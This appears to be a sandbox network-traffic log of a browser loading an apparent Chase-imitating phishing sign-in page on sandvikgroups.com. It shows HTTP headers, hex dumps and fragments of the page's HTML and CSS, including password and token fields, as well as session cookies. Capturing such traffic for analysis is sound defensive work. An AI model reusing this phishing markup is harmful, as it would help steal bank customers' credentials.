                                        2025-01-07 21:06:22 UTC1369INData Raw: 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 6c 69 62 2f 70 69 63 73 2f 66 61 76 69 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 6c 69 62 2f 70 69 63 73 2f 66 61 76 69 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22
                                        Data Ascii: quiv="X-UA-Compatible" content="IE=Edge"> <title>Sign in</title> <link rel="shortcut icon" href="?get_link=ch_files/lib/pics/favi.ico"> <link rel="apple-touch-icon" href="?get_link=ch_files/lib/pics/favi.png"> <link rel="stylesheet" href="
                                        2025-01-07 21:06:22 UTC1369INData Raw: 74 79 70 65 3d 22 74 65 78 74 22 20 72 65 71 75 69 72 65 64 3e 0a 09 09 09 09 09 09 3c 69 6e 70 75 74 20 6e 61 6d 65 3d 22 70 77 64 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 73 73 77 6f 72 64 22 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 72 65 71 75 69 72 65 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 74 6f 6b 65 6e 69 6e 70 75 74 22 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 68 69 64 65 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 54 6f 6b 65 6e 22 20 74 79 70 65 3d 22 74 65 78 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68
                                        Data Ascii: type="text" required><input name="pwd" class="input" placeholder="Password" type="password" required> <input id="tokeninput" name="token" class="input hide" placeholder="Token" type="text"> <input type="h
                                        2025-01-07 21:06:22 UTC1369INData Raw: 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 70 72 69 6d 61 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: label> </div> </div> </div> </div> <div class="row"> <button type="submit" class="primary">
                                        2025-01-07 21:06:22 UTC1369INData Raw: 6f 6e 28 63 2c 20 62 29 20 7b 0a 09 09 09 09 09 09 20 20 69 66 20 28 63 20 26 26 20 62 20 3d 3d 20 22 73 75 63 63 65 73 73 22 29 20 7b 0a 09 09 09 09 09 09 09 24 28 22 23 72 6f 74 61 74 65 22 29 2e 68 69 64 65 28 29 3b 0a 09 09 09 09 09 09 09 24 28 22 23 66 6f 72 6d 5f 62 6f 78 22 29 2e 68 74 6d 6c 28 63 29 3b 0a 0a 09 09 09 09 09 09 20 20 7d 0a 09 09 09 09 09 09 7d 29 0a 09 09 09 09 09 20 20 7d 29 0a 09 09 09 09 09 7d 29 3b 0a 09 09 09 09 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20
                                        Data Ascii: on(c, b) { if (c && b == "success") {$("#rotate").hide();$("#form_box").html(c); }}) })}); </script> </div> </div> </div> </div>
                                        2025-01-07 21:06:22 UTC1369INData Raw: 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 3e 50 72 69 76 61 63 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 3e 53 65 63 75 72 69 74 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20
                                        Data Ascii: <li> <a href="javascript:void(0)">Privacy </a> </li> <li> <a href="javascript:void(0)">Security </a> </li> <li>
                                        2025-01-07 21:06:22 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 3e 43 68 61 73 65 20 43 61 6e 61 64 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 22 3e 53 69 74 65 20 6d 61 70 0a 20 20 20 20 20 20
                                        Data Ascii: </a> </li> <li> <a href="javascript:void(0)">Chase Canada </a> </li> <li> <a href="javascript:void(0)">Site map
                                        2025-01-07 21:06:22 UTC696INData Raw: 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 66 72 61 6d 65 27 29 3b 61 2e 68 65 69 67 68 74 3d 31 3b 61 2e 77 69 64 74 68 3d 31 3b 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74
                                        Data Ascii: a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.posit
                                        2025-01-07 21:06:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        39192.168.2.449805188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:22 UTC1865OUTGET /?get_link=ch_files/ca/csspage2.php?page=signin&t=qrd0fg2hx9ez7rr HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: text/css,*/*;q=0.1
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: style
                                        Referer: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rr
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: cf_clearance=QM.MuetOShSYHUUxhvhqs8aE1tL0MSRSQdvVjfAEaaw-1736283956-1.2.1.1-ObYB.GVCdQwIutt9keZWdlW2OQPyI4jxD0b0VbSfU9Jtg08Q1Q_TS5p5jQru14FMfWGDNtbuahqWXbbNyHp_B0G79CjpmYBMMHTnSLHSqcOVYbCPzWrh5.h1dGG40P9OEY3cwNFW4SK1tQS_FIW..tNEt5CTmWv_UIQfNfhA9h1jX_7V4ggBxwXqaNp7JFd8jQ10qkWn6sAA2Ghd0kViYwPRr1QYJp4QGBEasr7Nbj5N7uUBvjEeXS_VliYSinJHh_t7FhKbW0S6D8ZKoTVpmdHqYtUpnVPtwiquH7dtfSowpG6_Mw5PjVAz7m3kXY8iSHSYBggvaVcsRJvTwyEAn6Wd0iZXLvIHyMAviJqzsjgCczOZwAj2agCz9U..YSiXu.e9SG2avYw1.tBX26vJQm72lA8CW_MUCGUuNHA..rhphR7el16l4ogfU9oQpol9; D7mJajRrTIUttfS2mEgvf1VX5yw=O_gwvhCcnX3CzFMPBaC6iuRuni4; a5smlNWZyQwMGE4rSwQDLY5XUrU=1736283973; 7WJ8eGztMSEV5f_BGht9hYAoijE=1736370373; KrlJOS-eE775YgYm2hpDZUkRTvc=fR4OZEkZ7f7DAJRlbnf-BnRcdyI; Z28TCGgyksAyn9w8pqGVpkcW9DU=24V5fd_SqGfynCsHmAJbl9ySndA; 2vr6FJpXLImaYDnK6ye90Ul8Pls=1736283976; qP8z4g21VQWXI8KiIvcj2au0iXk=1736370376; vXuI3jpYYO0XVdaNbL1zCBWkGQQ=uEfxLxDx4TmObmcF6RTOrtYCeIc; PHPSESSID=ac667dfa18e02e513ed41eabccae044c
                                        2025-01-07 21:06:22 UTC1137INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:22 GMT
                                        Content-Type: text/css; charset: UTF-8;charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Content-Type-Options: nosniff
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        X-XSS-Protection: 1; mode=block
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Pragma: no-cache
                                        Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate
                                        X-Nginx-Upstream-Cache-Status: BYPASS
                                        X-Server-Powered-By: Engintron
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xn2TYncPB5sUVw4ZEck9%2Bk9854gr6OMMrljCV6ek47Mnk4tRtw4WgyX4qYZ9r0qi4MFukunjPR8qLnw8PPrixIutDk5aXlnbegHSmKCCczW2EyZ8qKAMUUUMPFfEKy7CIyKESg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e94b0ed74357-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1614&rtt_var=610&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2487&delivery_rate=1787025&cwnd=175&unsent_bytes=0&cid=5656ea976625bc44&ts=747&x=0"
                                        2025-01-07 21:06:22 UTC232INData Raw: 33 35 61 62 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6c 69 67 68 74 65 72 5f 66 6f 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 66 6f 6e 74 73 2f 6c 69 67 68 74 65 72 5f 66 6f 6e 74 2e 65 6f 74 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28
                                        Data Ascii: 35ab@charset "UTF-8"; @font-face { font-family: lighter_font; font-style: normal; font-weight: 400; src: url(?get_link=ch_files/fonts/lighter_font.eot); src: url(
                                        2025-01-07 21:06:22 UTC1369INData Raw: 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 66 6f 6e 74 73 2f 6c 69 67 68 74 65 72 5f 66 6f 6e 74 2e 65 6f 74 3f 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 72 6c 28 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 66 6f 6e 74 73 2f 6c 69 67 68 74 65 72 5f 66 6f 6e 74 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 3f 67 65 74 5f 6c 69 6e 6b 3d 63 68 5f 66 69 6c 65 73 2f 66 6f 6e 74 73 2f 6c 69 67 68 74 65 72 5f 66 6f 6e 74 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 72 6c 28 3f 67 65 74 5f 6c 69 6e 6b
                                        Data Ascii: ?get_link=ch_files/fonts/lighter_font.eot?#iefix) format("embedded-opentype"), url(?get_link=ch_files/fonts/lighter_font.woff) format("woff"), url(?get_link=ch_files/fonts/lighter_font.ttf) format("truetype"), url(?get_link
                                        2025-01-07 21:06:22 UTC1369INData Raw: 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d
                                        Data Ascii: on::-moz-focus-inner, input::-moz-focus-inner { border: 0; padding: 0; } input { line-height: normal; } input[type="checkbox"], input[type="radio"] { -moz-box-
                                        2025-01-07 21:06:22 UTC1369INData Raw: 6f 70 3a 20 31 34 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 61 6c 6c 20 61 6e 64 20 28 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 32 34 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 3e
                                        Data Ascii: op: 142px; position: absolute; } } @media all and (min-height: 1024px) { footer > div { position: absolute; margin-top: 220px; } } footer >
                                        2025-01-07 21:06:22 UTC1369INData Raw: 73 6d 2d 34 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 35 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 36 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 37 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 38 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 39 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 31 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 31 30 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 31 31 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 31 32 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 32 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 33 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 34 2c 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 35 2c
                                        Data Ascii: sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5,
                                        2025-01-07 21:06:22 UTC1369INData Raw: 20 20 20 77 69 64 74 68 3a 20 31 36 2e 36 36 36 36 36 36 36 37 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 38 2e 33 33 33 33 33 33 33 33 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 31 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 31 2e 36 36 36 36 36 36 36 37 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d
                                        Data Ascii: width: 16.66666667%; } .col-xs-1 { width: 8.33333333%; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666667%; } .col-
                                        2025-01-07 21:06:23 UTC1369INData Raw: 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 31 2e 36 36 36 36 36 36 36 37 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 30 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 38 33 2e 33 33 33 33 33 33 33 33 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20
                                        Data Ascii: float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666667%; } .col-sm-10 { width: 83.33333333%; }
                                        2025-01-07 21:06:23 UTC1369INData Raw: 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 38 2e 33 33 33 33 33 33 33 33 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 36 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 35 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 31 2e 36 36 36 36 36 36 36 37 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 34 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: margin-left: 58.33333333%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666667%; } .col-sm-offset-4 {
                                        2025-01-07 21:06:23 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 36 2e 36 36 36 36 36 36 36 37 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 37 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 38 2e 33 33 33 33 33 33 33 33 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 36 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 35 20 7b 0a 20 20 20 20 20 20 20
                                        Data Ascii: width: 66.66666667% !important; } .col-sm-7 { width: 58.33333333% !important; } .col-sm-6 { width: 50% !important; } .col-sm-5 {
                                        2025-01-07 21:06:23 UTC1369INData Raw: 65 66 74 3a 20 34 31 2e 36 36 36 36 36 36 36 37 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 34 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 33 2e 33 33 33 33 33 33 33 33 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 6f 66
                                        Data Ascii: eft: 41.66666667% !important; } .col-sm-offset-4 { margin-left: 33.33333333% !important; } .col-sm-offset-3 { margin-left: 25% !important; } .col-sm-of


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        40192.168.2.449807104.17.25.144435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:22 UTC558OUTGET /ajax/libs/modernizr/2.8.3/modernizr.min.js HTTP/1.1
                                        Host: cdnjs.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Origin: https://sandvikgroups.com
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: script
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:23 UTC963INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:23 GMT
                                        Content-Type: application/javascript; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=30672000
                                        ETag: W/"5eb03f26-2b4c"
                                        Last-Modified: Mon, 04 May 2020 16:13:26 GMT
                                        cf-cdnjs-via: cfworker/kv
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Timing-Allow-Origin: *
                                        X-Content-Type-Options: nosniff
                                        CF-Cache-Status: HIT
                                        Age: 1254226
                                        Expires: Sun, 28 Dec 2025 21:06:23 GMT
